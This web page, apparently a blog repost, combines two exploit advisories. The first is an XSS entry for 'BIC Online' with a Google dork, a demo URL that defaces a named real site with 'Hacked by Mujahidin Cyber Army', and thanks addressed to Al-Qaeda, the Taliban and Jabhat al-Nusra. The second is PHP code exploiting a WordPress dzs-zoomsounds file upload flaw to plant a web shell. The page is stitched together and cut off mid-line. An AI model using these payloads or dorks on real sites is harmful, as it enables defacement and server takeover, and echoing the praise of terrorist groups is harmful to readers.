#########################################################
# Exploit Title: [ BIC Online - XSS Vulnerabilitie ]
########################################################
# Google Dork: [ "Powered by BIC Online" ]
# Date: [22/09/2015]
# Exploit Author: [Izza009 | Mujahidin Cyber Army]
# Vendor Homepage: [http://www.bic-ltd.com]
# Software Link: [-]
# Version: [app version] (REQUIRED)
# Tested on: [Win 8.1/Kali]
# CVE : [-]
########################################################
# Demo: http://www.cyberworld.hk/admin/index.php?e=%3Ch1%3EHacked%20by%20Mujahidin%20Cyber%20Army%20%3C/h1%3E
##########################################################
# Thanks to : Allah | Rosulullah | Tandhim Al-Qaeda | Thaliban | Jabhah Nushroh
# | United Islamic Cyber Force | Muslim Corporation Cyber | We Are Mujahidin Cyber Army
# Mujahidin Cyber Army : | El Jazrawi - Izza009 - Dr.Raw - Abu Mujahid - xGame1945 - [!] Jihad797 [!] - 1D10T |
############################################################ ############################## ###
################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS, array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...

Comments
Post a Comment